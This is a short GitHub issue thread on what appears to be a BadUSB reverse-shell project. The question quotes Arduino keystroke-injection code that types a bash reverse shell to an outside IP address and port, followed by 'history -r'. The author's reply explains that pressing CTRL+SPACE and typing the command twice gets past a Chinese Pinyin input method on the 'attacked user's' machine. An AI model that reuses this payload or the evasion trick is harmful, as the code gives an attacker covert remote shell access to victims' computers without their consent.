### ISSUE TITLE
What is this? CTRL+ ' '

### ISSUE THREAD

**Issue by grugnoymeme** [lzskyline/badusb_reverse_shell#1]
Keyboard.press(KEY_LEFT_CTRL);
  delay(200);
  Keyboard.press(' ');
  delay(200);
  Keyboard.release(KEY_LEFT_CTRL);
  delay(200);
  Keyboard.release(' ');
  Keyboard.println(" bash -i>& /dev/tcp/10.252.211.241/12354 0>&1;history -r");
  delay(200);
  Keyboard.println();

What is this? On macOS, after you started a d/dev/tcp connection, if you press 'CONTROL+SPACE', you get '^@' printed in a new line in terminal, and then, i do not understand why to repeat the line: bash -i >& /dev/tcp/attackerIP/PORT 0>&1; history -r
Please can you explain this to me... i know that: if u are in screen mode, pressing CTRL+a+d, you go back to your session, keeping in execution the "screen's session commands" maybe you are meaning this?!
Let me know please...

**Comment by lzskyline** [comment]
handle a situation where the "Attacked user turns on the PinYin input method". using CTRL + SPACE toggles the input method, cause I'm not sure if the user is currently in the Chinese input state, so execute the command twice to make sure that at least once is the correct command :)
